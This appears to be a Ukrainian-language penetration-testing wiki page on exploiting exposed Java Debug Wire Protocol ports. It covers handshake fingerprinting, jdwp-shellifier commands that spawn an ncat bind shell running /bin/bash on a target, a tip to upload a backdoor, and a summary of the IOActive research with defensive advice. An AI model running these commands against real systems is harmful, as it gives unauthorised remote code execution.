Pentesting JDWP - Java Debug Wire Protocol

Отримайте погляд хакера на ваші веб-додатки, мережу та хмару

Знайдіть і повідомте про критичні, експлуатовані вразливості з реальним бізнес-імпактом. Використовуйте наші 20+ спеціальних інструментів для картографування атакуючої поверхні, знаходження проблем безпеки, які дозволяють вам підвищити привілеї, і використовуйте автоматизовані експлойти для збору важливих доказів, перетворюючи вашу важку працю на переконливі звіти.

Експлуатація

Експлуатація JDWP залежить від відсутності аутентифікації та шифрування протоколу. Зазвичай він знаходиться на порті 8000, але можливі й інші порти. Початкове з'єднання здійснюється шляхом відправлення "JDWP-Handshake" на цільовий порт. Якщо служба JDWP активна, вона відповідає тим же рядком, підтверджуючи свою присутність. Цей хендшейк діє як метод відбитків для ідентифікації служб JDWP у мережі.

Щодо ідентифікації процесів, пошук рядка "jdwk" у процесах Java може вказувати на активну сесію JDWP.

Основний інструмент - jdwp-shellifier. Ви можете використовувати його з різними параметрами:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

Я виявив, що використання --break-on 'java.lang.String.indexOf' робить експлойт більш стабільним. І якщо у вас є можливість завантажити бекдор на хост і виконати його замість виконання команди, експлойт буде ще більш стабільним.

Більше деталей

Це резюме з https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Перевірте його для отримання додаткових деталей.

1. Огляд JDWP:

• Це пакетний мережевий бінарний протокол, переважно синхронний.

• Не має аутентифікації та шифрування, що робить його вразливим при відкритті до ворожих мереж.

1. Рукостискання JDWP:

• Використовується простий процес рукостискання для ініціації зв'язку. Обмінюється 14-символьний ASCII рядок “JDWP-Handshake” між Дебагером (клієнтом) та Дебагованим (сервером).

1. Комунікація JDWP:

• Повідомлення мають просту структуру з полями, такими як Довжина, Ідентифікатор, Прапор та Набір команд.

• Значення Набору команд варіюються від 0x40 до 0x80, представляючи різні дії та події.

1. Експлуатація:

• JDWP дозволяє завантажувати та викликати довільні класи та байт-код, що створює ризики безпеки.

• Стаття детально описує процес експлуатації в п'яти кроках, що включає отримання посилань на Java Runtime, встановлення точок зупинки та виклик методів.

1. Експлуатація в реальному житті:

• Незважаючи на потенційні захисти брандмауера, сервіси JDWP є виявленими та експлуатованими в реальних сценаріях, як показано пошуками на платформах, таких як ShodanHQ та GitHub.

• Скрипт експлойту був протестований на різних версіях JDK і є незалежним від платформи, пропонуючи надійне віддалене виконання коду (RCE).

1. Безпекові наслідки:

• Наявність відкритих сервісів JDWP в Інтернеті підкреслює необхідність регулярних перевірок безпеки, відключення функцій налагодження в продуктивному середовищі та належних конфігурацій брандмауера.

Посилання:

• [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]

• https://github.com/IOActive/jdwp-shellifier

• http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html

• http://www.secdev.org/projects/scapy(no longer active)

• http://www.shodanhq.com/search?q=JDWP-HANDSHAKE

• http://www.hsc-news.com/archives/2013/000109.html (no longer active)

• http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt

• https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults

• http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html

• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html

• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html

• http://nmap.org/nsedoc/scripts/jdwp-exec.html

Отримайте перспективу хакера на ваші веб-додатки, мережу та хмару

Знайдіть і повідомте про критичні, експлуатовані вразливості з реальним бізнес-імпактом. Використовуйте наші 20+ кастомних інструментів для картографування поверхні атаки, знаходження проблем безпеки, які дозволяють вам підвищити привілеї, і використовуйте автоматизовані експлойти для збору важливих доказів, перетворюючи вашу важку працю на переконливі звіти.